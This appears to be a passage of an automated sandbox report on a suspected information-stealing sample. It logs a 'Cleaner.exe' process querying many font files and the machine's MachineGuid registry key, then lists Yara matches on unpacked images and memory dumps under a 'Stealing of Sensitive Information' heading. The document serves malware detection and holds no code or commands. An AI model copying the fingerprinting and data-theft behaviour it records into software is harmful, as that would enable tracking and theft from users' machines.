                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.26.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.20.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.28.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.32.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.26.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.24.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.22.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.30.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.28.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.18.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.16.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.32.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.30.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2200000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2200000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313758394.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.303166143.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308578404.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.318572521.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308973675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.339625229.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.337565462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.301103570.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.319176574.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324022607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352494062.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.345502074.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.346406888.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313405136.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324526447.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.302389344.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.351860425.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
